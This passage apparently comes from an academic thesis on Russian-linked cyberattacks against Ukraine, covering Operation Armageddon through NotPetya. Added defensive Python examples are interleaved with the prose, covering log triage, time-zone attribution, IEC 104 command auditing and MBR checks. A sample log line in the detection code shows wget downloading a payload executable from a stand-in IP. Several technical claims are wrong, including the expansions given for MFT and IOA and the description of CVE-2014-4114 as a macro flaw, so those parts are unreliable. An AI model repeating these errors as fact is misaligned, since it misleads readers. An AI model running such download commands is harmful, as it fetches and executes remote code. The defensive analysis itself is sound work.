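    r"2014-08-04T09:12:03|C:\Users\op\AppData\Local\Temp\Total List of People detained in DPR from July 2014.scr|"
    r"C:\Users\op\AppData\Local\Temp\RarSFX0\wget.exe|"
    r"wget.exe -q http://203.0.113.7/upd/svc.exe -O C:\Users\op\AppData\Local\Temp\RarSFX0\svc.exe",
    r"2014-08-04T09:15:40|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\WINWORD.EXE|"
    r"WINWORD.EXE C:\Users\op\Documents\report.docx",
    r"2014-08-04T09:20:12|C:\Windows\System32\cmd.exe|C:\Tools\wget\wget.exe|"
    r"wget.exe https://example.org/index.html",
]


def main():
    for ts, rule, evidence in triage(SAMPLE_LOG):
        print(ts, rule, evidence)


if __name__ == "__main__":
    main()
```

Both rules are deliberately narrow: the fourth sample line (an administrator running wget from a tools directory) is not flagged, because the downloader heuristic requires the temp-directory staging that an SFX dropper produces, and the third line shows that an ordinary Office executable does not match the lure-name rule. In production the same logic would read Sysmon event ID 1 or an EDR process-creation stream rather than the constructed list.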

The Security Service of Ukraine (SBU) attributed the attack to the 16th and 18th Centers of the Russian FSB, and the Lookingglass Cyber Threat Intelligence Group stated that its evaluation found no evidence to the contrary.167 The timeline of Operation Armagedon and the timeline of the Ukrainian Crisis are correlated, and the targeting of specific groups changed as the physical conflict on the ground evolved. The attacks' timestamps correspond to working hours in Ukraine, and the attackers' fluency in Russian and lack of English make it more plausible that they are native Russian speakers than English or Ukrainian speakers. Lookingglass therefore concluded that the attackers most likely operate out of eastern Ukraine and are funded by the Russian government.168

This attack had both a national security and a political focus and was perpetrated against a state, so it falls within our definition of cyberattack. Operation Armagedon can safely be classified as cyber espionage because it was carried out against a state (Ukraine) by another state or non-state actor during an ongoing crisis or conflict, and it specifically targeted information to gather and then use maliciously. Because the attack aimed to gain information rather than to destroy or wreak direct havoc on Ukrainian computer networks or infrastructure, it cannot be considered an act of cyber warfare. While military personnel may have died as a consequence of this attack, no direct correlation has been found, so no deaths can be attributed to Operation Armagedon. For the attack to be considered information warfare it must be carried out by another state. While the SBU is generally confident that the FSB is behind the attacks, it appears that the attackers, although most likely state funded, are not members of the state apparatus and operate remotely from eastern Ukraine.

165 Lookingglass, "Operation Armageddon," 10.
166 Ibid., 8.
167 Ibid., 6. Citing https://ssu.gov.ua/sbu/control/en/publish/article?art_id=138949&cat_id=35317 and https://ssu.gov.ua/sbu/control/en/publish/article?art_id=131264&cat_id=131098
168 Lookingglass, "Operation Armageddon."

X-Agent.

X-Agent itself is a relatively commonly used piece of malware which utilizes backdoors for remote monitoring. While the X-Agent malware is not confined to this specific attack, this was the first time X-Agent was used against the Android platform rather than the iOS platform. The malicious software was embedded in a version of the military application Попр-Д30.apk, which simplified the use of the Ukrainian D-30 towed howitzer.169 This application was originally distributed without the X-Agent malware infection on a Ukrainian military forum on vKontakte, the Russian equivalent to Facebook, by Yaroslav Sherstuk, to approximately 9,000 artillery personnel on the Ukrainian eastern front.170 The corrupted application, distributed around this time (estimated to be approximately April 28, 2013), was then linked to the vKontakte forum, masquerading as the benign version. This malicious attack, which began before the Maidan revolution, persisted undetected until December 21, 2014.171 Even when the malicious application was discovered in late 2014, the malicious code could not be removed from Попр-Д30.apk; the application continued to run as the benign app should have, but kept relaying geolocation, movement, firing data, call logs, internet data, contacts and SMS data to the developer of the malicious application.172 This infected application would not have been able to provide all the data needed for a decisive attack against Ukrainian positions, which would otherwise have required additional reconnaissance for a physical attack.173

169 CrowdStrike Global Intelligence Team. “Use of FANCY BEAR Android Malware in Tracking of Ukrainian Field Artillery Units.” Published December 22, 2016. Updated March 23, 2017.
170 Ibid.
171 CrowdStrike, “Use of FANCY BEAR Android Malware.”

This was the first time X-Agent had been used on the Android platform, meaning that the attacking group had to change the code structure and therefore must have been familiar with the iOS code and usability. The known hacker group FANCY BEAR (also known by the names APT28, Sofacy, Sednit, Pawn Storm, STRONTIUM…) has used the iOS X-Agent malware successfully in the past against political targets, such as the Polish government and the United Nations.174 FANCY BEAR has been linked with “three distinctive attack vectors: spear phishing webmail with crafted word and excel documents attached, phishing websites hosted on typosquatted domains and malicious iFrames leading to Java and Flash zero-day exploits.”175 The Slovak IT security company ESET identified iOS timestamps of X-Agent in November 2012, with certain aspects of the code used prior to the first identified X-Agent timestamp.176 The iOS X-Agent malware was derived from the base code used to first implement a Windows version, which was then reimplemented on the Linux platform by the group FANCY BEAR.177 Since FANCY BEAR has had a long history of attacking geopolitical targets, has been attributed the use of X-Agent in past conflicts, and has the proficiency to manipulate the source code for use on different platforms, the use of X-Agent to infect the Попр-Д30.apk military application has been attributed to FANCY BEAR by Bitdefender and the CrowdStrike Threat Assessment Group, as well as the SBU.178 While ESET states that “performing attribution in a serious and scientific manner is a hard problem…outside of the scope of ESET’s mission,”179 they do clearly attribute other versions of X-Agent to FANCY BEAR, as well as observing that the group has the “ability to come up with brand-new zero-day vulnerabilities regularly.”180

172 CrowdStrike, “Use of FANCY BEAR Android Malware.”
173 Ibid.
174 “En Route with Sednit: Part 2: Observing the Comings and Goings.” ESET White Papers. October 2016.
175 Răzvan Benchea, Cristina Vatamanu, Alexandru Maximciuc and Victor Luncaşu. “APT28 Under the Scope: A Journey into Exfiltrating Intelligence and Government Information.” Bitdefender. 2015.
176 “En Route with Sednit,” ESET, 51.
177 “En Route with Sednit,” ESET, 53.

This attack falls within the classification of a cyberattack as it had a geopolitical motivation and was perpetrated against the Ukrainian state. The group FANCY BEAR is thought to be working with the GRU, but no definitive links can be determined. The security company Bitdefender only recognizes that the members of the group are Russian speaking and are operating from Russia or a neighboring Russian-speaking country.181 The timestamps of the attacks suggest that the attackers are in these regions, but also suggest that the attackers are an organized group, receiving funding, and operational during typical working hours. This would suggest that there is an external source of funding, so CrowdStrike suggests that the “tactical artillery force positioning intelligence by FANCY BEAR further supports [their] previous assessments that FANCY BEAR is likely affiliated with the GRU and works closely with Russian military forces.”182 While the link between FANCY BEAR and the GRU has not been fully proven, there is ample evidence to suggest that the attacks have been funded from an outside source and that the attacks attributed to FANCY BEAR are in line with Russian policy and international interests. This attack can be designated as an act of cyber espionage because it is carried out by a non-state actor (possibly funded by a state actor), aimed at the collection of information and data within the scope of an ongoing crisis.

178 CrowdStrike, “Use of FANCY BEAR Android Malware.”
179 “En Route with Sednit,” ESET, 48.
180 Ibid., 46.
181 Benchea et al., “APT28 Under the Scope,” 5.
182 CrowdStrike, “Use of FANCY BEAR Android Malware.”
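The working-hours reasoning that Lookingglass applied to Operation Armageddon, and that CrowdStrike and Bitdefender apply to FANCY BEAR above, can be made explicit as a small analyst check. The following is an added example, not code from the thesis or from any of the cited vendors: it takes a set of constructed UTC timestamps, converts them into several candidate time zones, and scores each zone by how many timestamps land on a weekday between 09:00 and 18:00 local time. The candidate zones (expressed as fixed UTC offsets, an assumption that ignores daylight saving), the working-hour window and the sample timestamps are all illustrative choices, not indicators from the reports.

```python
from datetime import datetime, timedelta, timezone

# Candidate operator time zones as fixed UTC offsets. Assumption for this
# example: daylight-saving rules are ignored; a production analysis would use
# zoneinfo so that each timestamp gets the offset in force on its date.
CANDIDATE_OFFSETS = {
    "Kyiv (UTC+2)": 2,
    "Moscow (UTC+3)": 3,
    "UTC": 0,
    "New York (UTC-5)": -5,
}

WORK_START, WORK_END = 9, 18   # local working day: 09:00 up to (not including) 18:00


def working_hours_fit(timestamps_utc, offsets=CANDIDATE_OFFSETS):
    """For each candidate zone, return the fraction of timestamps that fall on a
    weekday between WORK_START and WORK_END local time."""
    scores = {}
    for name, hours in offsets.items():
        if not timestamps_utc:
            scores[name] = 0.0
            continue
        tz = timezone(timedelta(hours=hours))
        hits = 0
        for ts in timestamps_utc:
            local = ts.astimezone(tz)
            if local.weekday() < 5 and WORK_START <= local.hour < WORK_END:
                hits += 1
        scores[name] = hits / len(timestamps_utc)
    return scores


def most_likely_zone(timestamps_utc, offsets=CANDIDATE_OFFSETS):
    """Candidate zone whose working day explains the most timestamps."""
    scores = working_hours_fit(timestamps_utc, offsets)
    return max(scores, key=scores.get)


# Constructed sample: twelve build/check-in timestamps in UTC. These are
# illustrative values, not indicators taken from Lookingglass or CrowdStrike.
SAMPLE_TIMESTAMPS = [
    datetime(2014, 3, 3, 7, 15, tzinfo=timezone.utc),    # Mon
    datetime(2014, 3, 4, 7, 40, tzinfo=timezone.utc),    # Tue
    datetime(2014, 3, 5, 8, 5, tzinfo=timezone.utc),     # Wed
    datetime(2014, 3, 6, 9, 30, tzinfo=timezone.utc),    # Thu
    datetime(2014, 3, 7, 10, 0, tzinfo=timezone.utc),    # Fri
    datetime(2014, 3, 10, 11, 20, tzinfo=timezone.utc),  # Mon
    datetime(2014, 3, 11, 12, 45, tzinfo=timezone.utc),  # Tue
    datetime(2014, 3, 12, 13, 10, tzinfo=timezone.utc),  # Wed
    datetime(2014, 3, 13, 14, 0, tzinfo=timezone.utc),   # Thu
    datetime(2014, 3, 14, 15, 30, tzinfo=timezone.utc),  # Fri
    datetime(2014, 3, 8, 10, 0, tzinfo=timezone.utc),    # Sat
    datetime(2014, 3, 9, 11, 0, tzinfo=timezone.utc),    # Sun
]

if __name__ == "__main__":
    ranked = sorted(working_hours_fit(SAMPLE_TIMESTAMPS).items(),
                    key=lambda kv: -kv[1])
    for zone, score in ranked:
        print(f"{zone:18s} {score:.2f}")
    print("best fit:", most_likely_zone(SAMPLE_TIMESTAMPS))
```

A high score is evidence of an operator routine, not proof of location: a group tasked to work unusual hours, or one that sets build timestamps deliberately, defeats the test, which is why the vendors cited above combine it with language and infrastructure evidence before drawing a conclusion.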

BlackEnergy 3/KillDisk.

Both BlackEnergy 3 and KillDisk are names of components of a single attack, but neither constitutes the entire attack. The attack on the power grid was highly sophisticated and used technical components beyond the general scope of small-time hacktivist groups. The attack began with a spear phishing campaign aimed at gaining access to the business networks of Ukrainian power distribution companies (oblenergos). Once the spear phishing attack was successful, the variant BlackEnergy 3 (BE3) was installed onto computers at each of the impacted oblenergos by exploiting the vulnerability CVE-2014-4114 in the OLE package of Microsoft Word.183 Following the download of BE3, the malware automatically establishes communication between a remote C&C and the infected computer. It is at this stage that the malware steals credentials from the business networks to later ensure lateral movement throughout the network, as well as identifying virtual private networks (VPNs) that can be used to enter the Industrial Control System (ICS) network on a larger scale.184 In preparation for carrying out the attack there was “the use of existing remote access tools within the environment or issuing commands directly from a remote station similar to an operator Human Machine Interface (HMI).”185

While the attack was in progress, the attackers uploaded malicious firmware to serial-to-Ethernet communication devices. This firmware was most likely developed prior to the attack, as all of it was uploaded within a short period of time across the oblenergos.186 In the final stage of the attack the attackers used “a modified KillDisk to erase the master boot record of impacted organization systems as well as to target and delete specific logs.”187 This variant of KillDisk malware rendered systems inoperable by corrupting the master boot record.188 The attackers then used the HMIs to utilize the “Uninterruptable Power Supplies (UPS) systems to implement a service outage.”189 Further, during the attack there was a DDoS attack on the call center to prevent customers from reporting the outages. The attack impacted approximately 225,000 customers and lasted for approximately 3 hours.190 It is thought that the zero-day exploit persisted in the network for 6 months before the attack became kinetic.191

183 Udi Shamir, “Analyzing a New Variant of BlackEnergy3: Likely Insider Based Execution.” SentinelOne. 26 January 2016. 1.
184 Robert Lee, Michael J. Assante and Tim Conway. “TLP: White Analysis of the Cyber Attack on the Ukrainian Power Grid: Defense Use Case.” Washington D.C.: SANS E-ISAC. March 18, 2016. 6.
185 Lee, et al., “White Analysis of the Cyber Attack,” 6.
186 Ibid., 7.

While the SentinelOne article concludes that there must have been insider help because the CVE-2014-4114 vulnerability was patched in Office 2013 and subsequent Office applications, this is unconfirmed.192 The patch for the vulnerable macros used in exploit CVE-2014-4114 disables those macros, but they can be re-enabled when a prompt with administrative privileges asks the user to do so. All aspects of the attack, including re-enabling macros, could be done remotely or by prompting a legitimate user to re-enable them through a phishing attack, for which there was evidence. There is a high likelihood that when prompted to turn on the macros needed to install BE3 onto the target computer, the legitimate user did not understand the request and naively allowed access. There were no deaths specifically attributed to the attack, and no persons were reported dying from lack of electricity or house temperatures dropping.193 However, this attack is the first of its kind to affect the civilian population substantially, as well as to have an important effect on the critical infrastructure of a state.

187 Lee, et al., “White Analysis of the Cyber Attack,” 7.
188 ICS-CERT. Cyber-Attack Against Ukrainian Critical Infrastructure. Alert (IR-ALERT-H-16-056-01). Washington, D.C. (Original release date: February 25, 2016).
189 Ibid.
190 Ibid.
191 Lee, et al., “White Analysis of the Cyber Attack,” 3.
192 Shamir, “Analyzing a New Variant of BlackEnergy3,” 1.
193 ICS-CERT. (IR-ALERT-H-16-056-01).

Attribution of the attack is largely based on circumstantial evidence, and no definitive case has been made against a state or other group. Shortly after the attack the SBU released a statement reporting that the attack was carried out by the GRU, but these accusations came before any investigations had concluded.194 Throughout 2017 the SBU reported the existence of connections between hackers operating against Ukraine and the Russian government, but none of the press releases substantiate the claims.195 In a 2016 FireEye report written in conjunction with iSight, a connection is made between BE3 and Sandworm Team, a known group operating on a pro-Russian political platform that is believed to have Kremlin connections.196 Other versions of BlackEnergy include a known tool used by Sandworm Team since 2014, which has run sophisticated malware campaigns using different variants of BlackEnergy.197 Further, the professionalism of the attack, and the attackers' ability to pull off a sophisticated attack with little to no problems in the code structures or from the firewall’s defenses, indicates that tests were run beforehand to know how the code would operate.198 However, beyond the Sandworm Team being comprised of Russian speakers operating from either Russia or a Russian border state, the persons operating on Sandworm Team are unknown. Further, while the SBU has accused Russia of funding Sandworm Team, there is no definitive proof that the team has been funded by the GRU. Although circumstantial evidence points to the alignment of Sandworm Team and the GRU, the Sandworm Team itself is implicated through the use of BlackEnergy 3.199

194 SBU Press Centre. “Russian Hackers plan energy subversion in Ukraine.” 28 December 2015. https://www.ukrinform.net/rubric-crime/1937899-russian-hackers-plan-energy-subversion-in-ukraine.html#
195 Ibid. Further press releases can be found at the following links: https://ssu.gov.ua/en/news/1/category/1/view/4250#.jRADsgAt.dpbs and https://ssu.gov.ua/en/news/1/category/1/view/4431#.ecmaqYxm.dpbs
196 Andy Greenberg. “How an entire nation became Russia’s test lab for Cyber War.” Wired. June 20, 2017. https://www.wired.com/story/russian-hackers-attack-ukraine/
197 ICS-CERT. Ongoing Sophisticated Malware Campaign Compromising ICS (Update E). Alert (ICS-ALERT-14-281-01E). Washington D.C. December 10, 2014. Last revised December 9, 2016.
198 Lee, et al., “White Analysis of the Cyber Attack,” 5.

This attack can be classified as a cyberattack because of its perpetration against a state, coupled with a security intent or national security focus. Further, this attack aimed to manipulate, corrupt and destroy computer systems on the civilian and military level. Since only three oblenergos were targeted, there is the possibility of an alternative motive other than instilling fear in civilians. While this would change the nature of the attack, the SBU and other experts generally assume that there was no military aspect to this attack, although purposeful military intent behind the BlackEnergy3/KillDisk power outages was determined.

Alternatively, the attacks could have been carried out by another actor, for a political reason, intended to instill terror or to spur government action. Thus, these attacks can be classified as cyber terrorism. This attack cannot be classified as cyber espionage as there was no code that would be used to steal data. The attack cannot be cyber warfare because it was not designed to do serious harm, and ties to a state-funded operation appear limited.

CrashOverride/Industroyer.

CrashOverride/Industroyer is the name given to the malicious software that was used on 17 December 2016 to attack the Ukrainian electric grid. This attack was more sophisticated than the BlackEnergy3/KillDisk attack the previous year and had a wider impact on military, government and civilian infrastructure. The attack began through a backdoor, installed by authenticating its existence via a local proxy. It is unknown how this initial backdoor was introduced to the computer system, since no record of phishing emails was found as in the 2015 attack. However, once one system is infected, it self-replicates to other computers. The malware communicates repeatedly, without pause, until a connection is established.200 Once the connection is established it installs an additional backdoor that masquerades as a legitimate Windows Notepad application.201 This extra backdoor is deployed in case the initial backdoor is discovered or patched. It can then be used to download payloads from a remote C&C. The initial backdoor also downloads the launcher component and is able to create and name blank mutex objects.202 There was no component found that could relay information back to the C&C for espionage purposes.203

199 John Hultquist. “Sandworm Team and the Ukrainian Power Authority Attacks,” iSight, 11 January 2016.

The launcher component is responsible for starting the payloads and then launching the data wiper component. Two different forensic investigations identified several payloads, uploaded from the launcher component, that were used to execute the attack.

The first identified was the 101 payload component, which is based on the international standard IEC 101, which “describes a protocol for monitoring and controlling electric power systems.”204 This payload component masquerades as the control of the RTU device, which can then turn Initial Operation Assessments off and on over a serial line communicating one bit at a time. The next identified payload is the 104 payload, which also operates based on an international standard. This payload is easily configurable and “can be customized by the attackers or different infrastructures.”205 While this payload is similar to the 101 payload, it does not communicate serially and “kills the legitimate master process” on the infected host.206 The 104 payload also has the ability to change the mode of RTU IOAs. The 61850 payload component is not dependent, can stand alone, and is based on the IEC 61850 standard that “describes a protocol used for multivendor communication among devices that perform protection, automation, metering, monitoring and control of electrical substation automation systems.”207 This payload automatically discovers relevant devices on the network by sending connection requests. If a request is accepted, the 61850 payload then continues sending requests to that specific IP address until it can discern whether the IP belongs to a logical node used to control circuit breakers and switches.208 The OPC DA (Open Platform Communications Data Access) payload is responsible for “real-time data exchange between components, based on a client-server model” and exists as a “stand alone malicious tool.”209 When executed it looks for specific markers naming OPC items. The final component is the data wiper, a destructive module for the final stage of the attack that is launched 1-2 hours prior to the termination of the attack and executes itself when the attack time is up. The data wiper is aimed at making attribution of the attack more difficult. Other components of CrashOverride/Industroyer included a Port Scanner Tool, used to map the network and find relevant computers, and a DoS Tool which rendered devices unresponsive until they were rebooted manually.210

200 Dragos Incorporated. “CRASHOVERRIDE: Analysis of the Threat to Electric Grid Operations.” Published 2017. https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
201 Ibid.
202 Ibid., 15.
203 Ibid., 15.
204 Anton Cherepanov. “Win32/Industroyer: A New Threat for Industrial Control Systems.” ESET. 12 June 2017.
205 Cherepanov, “Win32/Industroyer,” 7.
206 Dragos Incorporated, “CRASHOVERRIDE,” 17.
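The 101 and 104 payloads described above issue ordinary protocol commands to change the state of RTU information objects, which is why they are hard to tell apart from legitimate operator traffic. The following is an added example, not code from the thesis, ESET or Dragos: a minimal parser for IEC 60870-5-104 APDUs that identifies control-direction ASDUs (single and double commands and their relatives) and flags commands that come from a host other than the expected SCADA master, or that address an IOA outside an engineering baseline. The capture bytes, host addresses and the baseline IOA set are constructed for the example and are not from any real substation.

```python
import struct

# IEC 60870-5-104 type identifiers in the control direction: commands that
# change the state of an information object address (IOA) on the RTU.
CONTROL_TYPES = {45: "C_SC_NA_1", 46: "C_DC_NA_1", 47: "C_RC_NA_1",
                 48: "C_SE_NA_1", 49: "C_SE_NB_1", 50: "C_SE_NC_1",
                 51: "C_BO_NA_1", 58: "C_SC_TA_1", 59: "C_DC_TA_1",
                 60: "C_RC_TA_1", 61: "C_SE_TA_1", 62: "C_SE_TB_1",
                 63: "C_SE_TC_1", 64: "C_BO_TA_1"}
# Byte size of the information element that follows each 3-byte IOA, for the
# types this example decodes; other types are reported with objects=None.
ELEMENT_SIZE = {1: 1, 3: 1, 45: 1, 46: 1, 47: 1, 100: 1}
COT_NAMES = {3: "spontaneous", 6: "activation", 7: "activation-confirm",
             8: "deactivation", 10: "activation-termination", 20: "interrogated"}


def decode_element(type_id, elem):
    """Decode the qualifier byte of single (SCO) and double (DCO) commands."""
    e = elem[0]
    if type_id == 45:   # SCO: bit0 = on/off, bit7 = select(1)/execute(0)
        return {"select": bool(e & 0x80), "state": "on" if e & 0x01 else "off"}
    if type_id == 46:   # DCO: bits0-1 = 1 off / 2 on, bit7 = select/execute
        return {"select": bool(e & 0x80),
                "state": {1: "off", 2: "on"}.get(e & 0x03, "invalid")}
    return {"raw": elem.hex()}


def parse_apdu(data):
    """Parse one APDU: start byte 0x68, length, 4 control bytes, then the ASDU."""
    if len(data) < 6 or data[0] != 0x68:
        raise ValueError("not an IEC 104 APDU")
    if data[1] + 2 != len(data):
        raise ValueError("APDU length field disagrees with frame size")
    ctrl = data[2:6]
    if ctrl[0] & 0x01 == 0:
        fmt = "I"        # information transfer: carries an ASDU
    elif ctrl[0] & 0x03 == 0x01:
        fmt = "S"        # supervisory: acknowledgement only
    else:
        fmt = "U"        # unnumbered control: STARTDT, STOPDT, TESTFR
    frame = {"format": fmt}
    if fmt != "I":
        return frame
    frame["send_seq"] = (ctrl[0] >> 1) | (ctrl[1] << 7)
    frame["recv_seq"] = (ctrl[2] >> 1) | (ctrl[3] << 7)
    asdu = data[6:]
    if len(asdu) < 6:
        raise ValueError("ASDU header truncated")
    type_id, vsq = asdu[0], asdu[1]
    frame.update(type_id=type_id, type_name=CONTROL_TYPES.get(type_id, "other"),
                 cot=asdu[2] & 0x3F, cot_name=COT_NAMES.get(asdu[2] & 0x3F, "?"),
                 negative=bool(asdu[2] & 0x40),
                 common_addr=struct.unpack_from("<H", asdu, 4)[0])
    size = ELEMENT_SIZE.get(type_id)
    if size is None:
        frame["objects"] = None
        return frame
    objects, pos, count = [], 6, vsq & 0x7F
    if vsq & 0x80:       # SQ=1: one IOA, then contiguous elements
        base = int.from_bytes(asdu[pos:pos + 3], "little"); pos += 3
        for i in range(count):
            objects.append({"ioa": base + i, **decode_element(type_id, asdu[pos:pos + size])})
            pos += size
    else:                # SQ=0: every element carries its own IOA
        for _ in range(count):
            ioa = int.from_bytes(asdu[pos:pos + 3], "little"); pos += 3
            objects.append({"ioa": ioa, **decode_element(type_id, asdu[pos:pos + size])})
            pos += size
    frame["objects"] = objects
    return frame


def audit_capture(frames, allowed_masters, baseline_ioas):
    """Flag control-direction commands from an unexpected source host or to an
    IOA outside the engineering baseline. frames: iterable of (src_ip, bytes)."""
    alerts = []
    for src, raw in frames:
        f = parse_apdu(raw)
        if f["format"] != "I" or f["type_id"] not in CONTROL_TYPES or not f["objects"]:
            continue
        for obj in f["objects"]:
            reasons = []
            if src not in allowed_masters:
                reasons.append("command from host that is not the SCADA master")
            if obj["ioa"] not in baseline_ioas:
                reasons.append("IOA not in engineering baseline")
            if reasons:
                alerts.append({"src": src, "type": f["type_name"], "ioa": obj["ioa"],
                               "state": obj.get("state"), "select": obj.get("select"),
                               "reasons": reasons})
    return alerts


# Constructed capture (not real traffic): (source IP, APDU bytes). Assumed
# topology: 10.0.0.10 is the SCADA master, 10.0.0.20 an RTU, 10.0.0.77 unknown.
ALLOWED_MASTERS = {"10.0.0.10"}
BASELINE_IOAS = {2001}
CAPTURE = [
    ("10.0.0.20", bytes.fromhex("680e00000000010103000100e9030001")),  # M_SP_NA_1, IOA 1001 on
    ("10.0.0.10", bytes.fromhex("680e040002002d0106000100d1070001")),  # C_SC_NA_1 execute on, IOA 2001
    ("10.0.0.77", bytes.fromhex("680e000000002d0106000100d1070001")),  # same command, unknown host
    ("10.0.0.10", bytes.fromhex("680e060002002e0106000100d2070081")),  # C_DC_NA_1 select off, IOA 2002
    ("10.0.0.10", bytes.fromhex("680443000000")),                      # U-frame TESTFR act
]

if __name__ == "__main__":
    for alert in audit_capture(CAPTURE, ALLOWED_MASTERS, BASELINE_IOAS):
        print(alert)
```

The source-address check alone is not sufficient: the 104 payload kills the legitimate master process on the infected host, so its commands arrive from the master's own address. The IOA baseline, and in a real deployment a rate check on select/execute sequences, are what catch that case.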

This family of malware is designed specifically to attack industrial electric grids, and use of the malware requires sophisticated knowledge of both the code structure and how the electric grids are configured. Both the Dragos and ESET reports are focused on the attack structure and do not focus on attribution. After the attack there was little indication of the perpetrator behind the attacks, although the similarities between the 2015 and 2016 attacks brought accusations against Russia and Russian security services.211 The attack’s data wiper component makes it difficult to attribute the attack to a specific group, but the Sandworm Team has been labeled responsible.212

207 Cherepanov, “Win32/Industroyer,” 10.
208 Ibid., 11.
209 Ibid., 12.
210 Ibid. and Dragos Incorporated, “CRASHOVERRIDE.”

Attribution of the CrashOverride/Industroyer attack to Sandworm Team is even more circumstantial than the attribution of the BlackEnergy3/KillDisk attack.

Since this attack is nearly impossible to attribute, classification is nearly impossible.

However, it cannot be deemed to be cyberwarfare because the attack was not made to create a long-lasting effect on the electrical grid. Although the code could be altered to create a wide-scale meltdown of electric grids in future attacks, the Ukrainian attack did not do so despite the attackers having the opportunity. Thus, it appears clear that the attack was not made to create serious harm to persons or strategic objects. After the attack was completed, the electrical grid was not destroyed, but there were delays for some sectors, such as the railways and mines, before they became operational again and continued operations at normal levels. Further, since there is no hard evidence that this was perpetrated by a state or a state-funded group, this effectively rules out the possibility of cyber warfare. This attack cannot be classified as cyber espionage because the code had no payload which would communicate information to a remote C&C. However, since the goal of the attack was to temporarily disable the electric grid, this can be labeled an act of cyber terrorism because there was no definitive military or government target. However, due to the interconnected nature of the grid, civilian, governmental and military infrastructure was compromised.

211 Greenberg, “Russia’s test lab for Cyber War.”
212 Kim Zetter, “The Ukrainian Power Grid Was Hacked Again,” Vice News, 10 January 2017. https://motherboard.vice.com/en_us/article/bmvkn4/ukrainian-power-station-hacking-december-2016-report

NotPetya.

NotPetya is the name of a cyberattack that initially targeted Ukraine but subsequently spread across the globe. It takes its name from the fact that it was originally thought to be the ransomware known as Petya, first discovered in 2016. NotPetya is a variant of Petya ransomware that was used as a data wiper rather than as ransomware. The infected computer would show a screen demanding a payout in Bitcoin but, upon payment, would not return the data because it had already been permanently deleted at the onset of the ransomware screen. Additionally, it has the ability to self-propagate across networks, making it difficult to stop from spreading.213 It utilizes the CVE-2017-0144 vulnerability in the SMB (Server Message Block) service to propagate, an exploit known as EternalBlue, developed by the U.S. National Security Agency and leaked in April of 2017.214 This is the same vulnerability that was used successfully in the WannaCry ransomware outbreak that took place in May 2017. NotPetya can also spread across networks through SMB copy and remote execution or network node enumeration.215

The attack begins by infecting a machine with NotPetya through the exploit. After the malware is installed on a device, it drops a ransomware DLL (Dynamic Link Library) that allows the malware to execute processes on other systems as it takes over command execution on the machine. Following this, the malware uses hashes to determine the processes running on the system and tries to gain various privileges on the device. Any level of privileges can be obtained, and if they are, credential theft is not executed. If credential theft is necessary to gain access to the locked privileges, the malware obtains the credentials by creating a PeekNamedPipe that grabs credential information and sends it to the NotPetya malware via the pipe. Impersonation can then commence if the required privilege is granted through the previous steps. If impersonation is possible, the SMB copy is executed remotely. It is after this that the malware attempts to propagate across the network or to new networks through network node enumeration, SMB copy and remote execution, or SMB exploitation using the EternalBlue vulnerability.216

213 Karan Sood and Shaun Hurley, “NotPetya Technical Analysis - A Triple Threat: File Encryption, MFT Encryption, Credential Theft,” CrowdStrike, June 29, 2017. https://www.crowdstrike.com/blog/petrwrap-ransomware-technical-analysis-triple-threat-file-encryption-mft-encryption-credential-theft/
214 Lily Hay Newman, “The Leaked NSA Spy Tool that Hacked the World,” Wired, March 7, 2018. https://www.wired.com/story/eternalblue-leaked-nsa-spy-tool-hacked-world/
215 Sood and Hurley, “NotPetya Technical Analysis.”

The malware then attempts to connect to the server using credentials stolen from the infected machine. If the server is infected, then the malware will spread to all machines connected to the server. At this point, the ransomware manipulates the Master Boot Record (MBR), which is responsible for the identification of the operating system and houses code that functions as a loader for the operating system. NotPetya does not corrupt the MBR, but rather overwrites it with its own custom boot loader, allowing it to hide its tracks as well as execute the rest of the ransomware. After the MBR is overwritten, it encrypts the Managed File Transfer (MFT) responsible for secure internal and external data transfers. This allows the malware to display a false check screen warning of a disk error, telling the user not to turn off their PC. During this, NotPetya encrypts Sector 33, which is used as an integrity check for decryption, destroying the key and causing a disk reboot. After the reboot, a screen appears announcing that all files have been encrypted and that a payment in Bitcoin is required to purchase a key to decrypt the files. While the Petya ransomware allows the possibility of recovering files, entering a key into NotPetya will cause further damage and will not recover the lost files. Instead it will encrypt individual files and then give the user a false installation key. Files cannot be recovered and the entire server is compromised. NotPetya employs anti-forensic measures to zero out its file contents and delete itself from the disk.217

216 Sood and Hurley, “NotPetya Technical Analysis.”
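Both the KillDisk stage of the 2015 attack, which corrupted the master boot record, and NotPetya, which overwrites it with a custom boot loader while leaving the rest of the sector usable, change sector 0 in ways a defender can check against a known-good baseline. The following is an added example, not code from the thesis, SANS, ICS-CERT or CrowdStrike: it hashes the boot-code and partition-table regions of a 512-byte MBR separately, so that a zeroed sector and a replaced loader produce different findings. The sample sectors are constructed inside the code; their byte patterns are placeholders standing in for loader code, not real boot loaders.

```python
import hashlib
import struct

SECTOR = 512
BOOT_CODE = slice(0, 446)          # loader code: the region a custom boot loader replaces
PARTITION_TABLE = slice(446, 510)  # four 16-byte partition entries
SIGNATURE = slice(510, 512)        # must read 0x55 0xAA for the BIOS to boot the disk


def _sha256(b):
    return hashlib.sha256(b).hexdigest()


def mbr_baseline(sector):
    """Record per-region hashes of a known-good MBR (taken at provisioning)."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly one 512-byte sector")
    return {"boot_code": _sha256(sector[BOOT_CODE]),
            "partition_table": _sha256(sector[PARTITION_TABLE])}


def check_mbr(sector, baseline):
    """Compare a freshly read sector 0 against the baseline. Returns a list of
    findings; an empty list means the MBR is unchanged."""
    if len(sector) != SECTOR:
        return ["sector is not 512 bytes"]
    findings = []
    if sector[SIGNATURE] != b"\x55\xaa":
        findings.append("boot signature missing (sector zeroed or corrupted)")
    if _sha256(sector[BOOT_CODE]) != baseline["boot_code"]:
        findings.append("boot code changed (possible replaced boot loader)")
    if _sha256(sector[PARTITION_TABLE]) != baseline["partition_table"]:
        findings.append("partition table changed")
    return findings


def _partition_entry(bootable, ptype, lba_start, sectors):
    # CHS fields carry placeholder values; modern loaders use the LBA fields.
    return struct.pack("<8BII", 0x80 if bootable else 0x00, 0x20, 0x21, 0x00,
                       ptype, 0xFE, 0xFF, 0xFF, lba_start, sectors)


# Constructed sample images (not real disk contents).
GOOD_BOOT_CODE = bytes([0xEB, 0x63, 0x90]) + b"\x00" * 443            # placeholder loader bytes
TABLE = _partition_entry(True, 0x07, 2048, 204800) + b"\x00" * 48    # one NTFS entry, three empty
GOOD_MBR = GOOD_BOOT_CODE + TABLE + b"\x55\xaa"
# KillDisk-style damage: the sector no longer carries a loader or a signature.
ZEROED_MBR = b"\x00" * SECTOR
# NotPetya-style damage: loader replaced, signature and partitions untouched, so
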